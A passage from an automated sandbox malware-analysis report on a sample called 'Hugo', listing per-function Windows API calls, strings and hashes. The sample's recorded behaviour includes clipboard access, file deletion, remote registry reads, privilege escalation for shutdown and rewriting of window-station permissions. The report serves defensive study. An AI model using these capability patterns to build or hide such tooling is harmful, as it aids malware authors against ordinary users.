Part of subcall function 00F71A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F71B48), ref: 00F71A20
Part of subcall function 00F71A0B: CloseHandle.KERNEL32(?,?,00F71B48), ref: 00F71A35

Strings

winsta0, xrefs: 00F71C18
default, xrefs: 00F71C57
, xrefs: 00F71BA6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: aa9ca319c6fc6813df00efc4612ba87f62ab9e64c9ab89d929cb1fcf67fab64e
Instruction ID: 22f9c6f68a86988c3db352788b1515759eb9449362897d5fd6a2d0d65dcd0bf0
Opcode Fuzzy Hash: aa9ca319c6fc6813df00efc4612ba87f62ab9e64c9ab89d929cb1fcf67fab64e
Instruction Fuzzy Hash: 2F8194B1900209AFDF219FA8DC49FEE7BB8FF05310F14801AF919A61A0D7758A49EF51

Function 00F714AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71A60
Part of subcall function 00F71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A6C
Part of subcall function 00F71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A7B
Part of subcall function 00F71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A82
Part of subcall function 00F71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F71A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F71518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F7154C
GetLengthSid.ADVAPI32(?), ref: 00F71563
GetAce.ADVAPI32(?,00000000,?), ref: 00F7159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F715B9
GetLengthSid.ADVAPI32(?), ref: 00F715D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F715D8
HeapAlloc.KERNEL32(00000000), ref: 00F715DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F71600
CopySid.ADVAPI32(00000000), ref: 00F71607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F71636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F71658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F7166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F71691
HeapFree.KERNEL32(00000000), ref: 00F71698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F716A1
HeapFree.KERNEL32(00000000), ref: 00F716A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F716B1
HeapFree.KERNEL32(00000000), ref: 00F716B8
GetProcessHeap.KERNEL32(00000000,?), ref: 00F716C4
HeapFree.KERNEL32(00000000), ref: 00F716CB

Part of subcall function 00F71ADF: GetProcessHeap.KERNEL32(00000008,00F714FD,?,00000000,?,00F714FD,?), ref: 00F71AED
Part of subcall function 00F71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F714FD,?), ref: 00F71AF4
Part of subcall function 00F71ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F714FD,?), ref: 00F71B03

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: b7c8660fa58fb3e685117363aed4e333f799ac03ff9bbf5429fda2f6448aad17
Instruction ID: 12c101eac05149104f50950273da80aca05b4d7182127936ce4e04e31e24d6ca
Opcode Fuzzy Hash: b7c8660fa58fb3e685117363aed4e333f799ac03ff9bbf5429fda2f6448aad17
Instruction Fuzzy Hash: 2E716EB2900209ABDF10DFA9DC44FEEBBB8BF04750F088516E91AA7191D730D909DBA1

Function 00F8F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00FADCD0), ref: 00F8F586
IsClipboardFormatAvailable.USER32(0000000D), ref: 00F8F594
GetClipboardData.USER32(0000000D), ref: 00F8F5A0
CloseClipboard.USER32 ref: 00F8F5AC
GlobalLock.KERNEL32(00000000), ref: 00F8F5E4
CloseClipboard.USER32 ref: 00F8F5EE
GlobalUnlock.KERNEL32(00000000), ref: 00F8F619
IsClipboardFormatAvailable.USER32(00000001), ref: 00F8F626
GetClipboardData.USER32(00000001), ref: 00F8F62E
GlobalLock.KERNEL32(00000000), ref: 00F8F63F
GlobalUnlock.KERNEL32(00000000), ref: 00F8F67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 00F8F695
GetClipboardData.USER32(0000000F), ref: 00F8F6A1
GlobalLock.KERNEL32(00000000), ref: 00F8F6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F8F6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8F6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F8F72F
GlobalUnlock.KERNEL32(00000000), ref: 00F8F750
CountClipboardFormats.USER32 ref: 00F8F771
CloseClipboard.USER32 ref: 00F8F7B6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: b350f8ed2febb2b160bfd5c14dd76f1f7b6bf1603f73549b4c392a99e0fc87bb
Instruction ID: bd45e9a15b49b271dc2c770edbb3b69e1be7e58890bd9959107d128fc0247044
Opcode Fuzzy Hash: b350f8ed2febb2b160bfd5c14dd76f1f7b6bf1603f73549b4c392a99e0fc87bb
Instruction Fuzzy Hash: CE61B0752042059FD300FF20DC85FAAB7E4AF85714F14456DF886CB2A2DB35E949EB62

Function 00F873D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F87403
FindClose.KERNEL32(00000000), ref: 00F87457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F87493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F874BA

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 00F874F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F87524

Strings

%03d, xrefs: 00F877E7
%4d%02d%02d%02d%02d%02d, xrefs: 00F875AF
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00F87577
%02d, xrefs: 00F87645, 00F8764F, 00F8769F, 00F876EF, 00F8773F, 00F8778F
%4d, xrefs: 00F875F6

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 09af8722855f189db2324005fac199b73ab7f0b47aedb334fe501f3122c8ec6e
Instruction ID: f81b9cf4add425228dda493ff82d4c235ec733699c1a5b74905b3ee596c6b549
Opcode Fuzzy Hash: 09af8722855f189db2324005fac199b73ab7f0b47aedb334fe501f3122c8ec6e
Instruction Fuzzy Hash: DDD15FB2508344AFC310EB64CC95EAFB7ECAF88704F44491DF585D6292EB78DA48D762

Function 00F8A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F8A0A8
GetFileAttributesW.KERNEL32(?), ref: 00F8A0E6
SetFileAttributesW.KERNEL32(?,?), ref: 00F8A100
FindNextFileW.KERNEL32(00000000,?), ref: 00F8A118
FindClose.KERNEL32(00000000), ref: 00F8A123
FindFirstFileW.KERNEL32(*.*,?), ref: 00F8A13F
SetCurrentDirectoryW.KERNEL32(?), ref: 00F8A18F
SetCurrentDirectoryW.KERNEL32(00FD7B94), ref: 00F8A1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8A1B7
FindClose.KERNEL32(00000000), ref: 00F8A1C4
FindClose.KERNEL32(00000000), ref: 00F8A1D4

Strings

*.*, xrefs: 00F8A13A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 1d5feb45684c1b2b67f125c7d12f8dc68d9b99bcc77be3fd7d1c1da98cba0714
Instruction ID: a20565baf9fe580a209bfdd61eb529e0e032999b1b16a93eff6a93fe42984ceb
Opcode Fuzzy Hash: 1d5feb45684c1b2b67f125c7d12f8dc68d9b99bcc77be3fd7d1c1da98cba0714
Instruction Fuzzy Hash: 2931BF72A0061D6BEB10ABA49C4EADE73ACEF45330F140096E816E2190EB74DE44AF65

Function 00F84763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F84785
_wcslen.LIBCMT ref: 00F847B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F847E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F84803
RemoveDirectoryW.KERNEL32(?), ref: 00F84813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F8489A
CloseHandle.KERNEL32(00000000), ref: 00F848A5
CloseHandle.KERNEL32(00000000), ref: 00F848B0

Strings

\, xrefs: 00F847BC
:, xrefs: 00F847C7
\??\%s, xrefs: 00F847A0

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 96c3105594d98f0756eeff2c74327b89eed443e3dce7d25db52c7634ffbd6047
Instruction ID: 784c612b439979234fcb04f6c6fd98c8992d388069be88a784d0b895ac87efe6
Opcode Fuzzy Hash: 96c3105594d98f0756eeff2c74327b89eed443e3dce7d25db52c7634ffbd6047
Instruction Fuzzy Hash: 1631C4B190024AABDB21AFA0DC49FEF37BDEF89750F1041B6F509D6060E774A644EB24

Function 00F8A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00F8A203
FindNextFileW.KERNEL32(00000000,?), ref: 00F8A25E
FindClose.KERNEL32(00000000), ref: 00F8A269
FindFirstFileW.KERNEL32(*.*,?), ref: 00F8A285
SetCurrentDirectoryW.KERNEL32(?), ref: 00F8A2D5
SetCurrentDirectoryW.KERNEL32(00FD7B94), ref: 00F8A2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8A2FD
FindClose.KERNEL32(00000000), ref: 00F8A30A
FindClose.KERNEL32(00000000), ref: 00F8A31A

Part of subcall function 00F7E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F7E3B4

Strings

*.*, xrefs: 00F8A280

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: 1abcab34529a0a19af5052a30798bf5fe7ad246b540a46f3639175da27769d5b
Instruction ID: 729ed464003f7e99764ccc56bbf0a8918e8db442e545a3b6b4598952a41acc2e
Opcode Fuzzy Hash: 1abcab34529a0a19af5052a30798bf5fe7ad246b540a46f3639175da27769d5b
Instruction Fuzzy Hash: B031037290060D6AEF20BFA4DC09ADE77ACDF45334F144193E811A2190EB35DE85EB22

Function 00F9C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F9D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F9C10E,?,?), ref: 00F9D415
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D451
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4C8
Part of subcall function 00F9D3F8: _wcslen.LIBCMT ref: 00F9D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F9CA09
RegCloseKey.ADVAPI32(00000000), ref: 00F9CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F9CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F9CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F9CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F9CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F9CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F9CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F9CDE2
RegCloseKey.ADVAPI32(00000000), ref: 00F9CDEF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 8db8f5d57bbf98326c6f10da9a4786c0193d19a37cbd28dcddb0ef6a2d36ce2d
Instruction ID: b7cc6d828fa00161edd5abf43dc902ac0842ea3c610d769a15644cedfad94207
Opcode Fuzzy Hash: 8db8f5d57bbf98326c6f10da9a4786c0193d19a37cbd28dcddb0ef6a2d36ce2d
Instruction Fuzzy Hash: D5025271A042009FDB14DF24C895E2ABBE5FF89314F18849DF84ACB2A2D735ED46DB91

Function 00F7D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00F15851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F155D1,?,?,00F54B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F15871

Part of subcall function 00F7EAB0: GetFileAttributesW.KERNEL32(?,00F7D840), ref: 00F7EAB1

FindFirstFileW.KERNEL32(?,?), ref: 00F7D9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F7DA88
MoveFileW.KERNEL32(?,?), ref: 00F7DA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 00F7DAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7DAE2

Part of subcall function 00F7DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F7DAC7,?,?), ref: 00F7DB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 00F7DAFE
FindClose.KERNEL32(00000000), ref: 00F7DB0F

Strings

\*.*, xrefs: 00F7D978, 00F7D981, 00F7D996

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 311f0295a6586f4ac75b7587b3b8cc1e6736456d7691cb1c099a917ea0f312b3
Instruction ID: c59647448c0291dfc39a9fccc27481b4cb217b61cb87c0489f58a3fe5c4822e7
Opcode Fuzzy Hash: 311f0295a6586f4ac75b7587b3b8cc1e6736456d7691cb1c099a917ea0f312b3
Instruction Fuzzy Hash: CD617E31C0110DEECF05EBA0DD929EDB7B5AF54300F6080A6E406B7192EB395F49EB51

Function 00F8F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00F8F7EE
EmptyClipboard.USER32 ref: 00F8F7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 00F8F809
CloseClipboard.USER32 ref: 00F8F900

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e0de43c5e77494cd1127dac486fc5be5cebeef584d7ad96bef1220412f98b697
Instruction ID: 2f6a2a410411287d0b4fdd98951fdfba3b1274659860df902a55b35e490193c9
Opcode Fuzzy Hash: e0de43c5e77494cd1127dac486fc5be5cebeef584d7ad96bef1220412f98b697
Instruction Fuzzy Hash: 7B41AD71A04601AFD710DF15D888B95BBE4FF45328F14C0A8E85A8FB62CB35EC46EB90

Function 00F7F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00F72010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7205A
Part of subcall function 00F72010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F72087
Part of subcall function 00F72010: GetLastError.KERNEL32 ref: 00F72097

ExitWindowsEx.USER32(?,00000000), ref: 00F7F249

Strings

SeShutdownPrivilege, xrefs: 00F7F219
, xrefs: 00F7F273
, xrefs: 00F7F237
@, xrefs: 00F7F23C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 51d4076b8c7aaf91a3308ed8c1cd0ec86668a464f9ab8e07be65c219bd62dfd7
Instruction ID: 9704c4614179601ca4e0461fdfd7bffdde5eff3dbc37975c239e0d433f16d70f
Opcode Fuzzy Hash: 51d4076b8c7aaf91a3308ed8c1cd0ec86668a464f9ab8e07be65c219bd62dfd7
Instruction Fuzzy Hash: AA01DB76B202146BEB1466785C89BBE726C9F09364F158533FD07E21D3D5645D08F162

Function 00F83A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F556C2,?,?,00000000,00000000), ref: 00F83A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F556C2,?,?,00000000,00000000), ref: 00F83A35
LoadResource.KERNEL32(?,00000000,?,?,00F556C2,?,?,00000000,00000000,?,?,?,?,?,?,00F166CE), ref: 00F83A45
SizeofResource.KERNEL32(?,00000000,?,?,00F556C2,?,?,00000000,00000000,?,?,?,?,?,?,00F166CE), ref: 00F83A56
LockResource.KERNEL32(00F556C2,?,?,00F556C2,?,?,00000000,00000000,?,?,?,?,?,?,00F166CE,?), ref: 00F83A65

Strings

SCRIPT, xrefs: 00F83A2B

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 794edad9091aac9fd507ce486fa350f85a953e526b8ab6889fe487a046126076
Instruction ID: 26d78a70f61d3ab9d20c986ddc06bbdb82d9c2d6d129077bde55ad786b5a91ee
Opcode Fuzzy Hash: 794edad9091aac9fd507ce486fa350f85a953e526b8ab6889fe487a046126076
Instruction Fuzzy Hash: C41179B4600705BFE7259B25DC48F677BB9EBC6B50F14426CB402D66A0DBB1E900EA20

Function 00F720AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F71900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F71916
Part of subcall function 00F71900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F71922
Part of subcall function 00F71900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F71931
Part of subcall function 00F71900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F71938
Part of subcall function 00F71900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F7194E

GetLengthSid.ADVAPI32(?,00000000,00F71C81), ref: 00F720FB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F72107
HeapAlloc.KERNEL32(00000000), ref: 00F7210E
CopySid.ADVAPI32(00000000,00000000,?), ref: 00F72127
GetProcessHeap.KERNEL32(00000000,00000000,00F71C81), ref: 00F7213B
HeapFree.KERNEL32(00000000), ref: 00F72142

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
